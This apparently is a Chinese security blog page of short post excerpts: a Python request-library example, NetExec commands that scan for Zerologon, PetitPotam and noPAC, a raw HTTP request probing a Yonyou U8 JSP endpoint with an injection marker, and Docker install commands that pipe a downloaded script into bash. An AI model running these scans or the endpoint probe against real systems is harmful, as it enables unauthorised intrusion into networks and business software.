感觉这样写起来贼方便,突然就明白了二次封装
的好处了from SimpleRequestFramework import SimpleRequestFramework custom_headers = { "User-Agent": "CustomUserAgent/1.0", "Authorization": "Bearer YOUR_TOKEN" } # new a framework instance, and set the save directory, use proxy, proxy type, proxy address, and custom headers framework = SimpleRequestFramework( save_directory="output_files", use_proxy=True, proxy_type="http", proxy_address="http://127.0.0.1:8080", headers=custom_headers ) # GET request example get_url = "https://api.ip.sb/ip" params = { "param1": "value1", "param2": "value2" } framework.fetch_and_save(get_url, "output_get.json", method="GET", params=params) # POST request example post_url = "https://httpbin.org/post" data = { "data1": "value1", "data2": "value2" } framework.fetch_and_save(post_url, "output_post.json", method="POST", data=data)
下载地址 官方文档 粗略看了一下,它支持漏洞扫描
,尽管只有三个 ZerologonNetExec smb <ip> -u '' -p '' -M zerologo
PetitPotamNetExec smb <ip> -u '' -p '' -M petitpotam
noPACNetExec smb <ip> -u 'user' -p 'pass' -M nopac
其余的感觉跟cme差不多
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A2BF47E766B3CFCFA6BB152CC6C175B9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
userName=*
最近经常高频使用docker
和docker-compose
,没事就百度,总结一下 1.装dockercurl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun
2.装docker-compose 从Github下载docker-compose 移动到/usr/local/bin/docker-compose
赋予执行权限chmod +x /usr/local/bin/docker-compose
或许真的应该跟上时代的潮流,学习一些新的技能/知识了。传统的web似乎有点打不动了...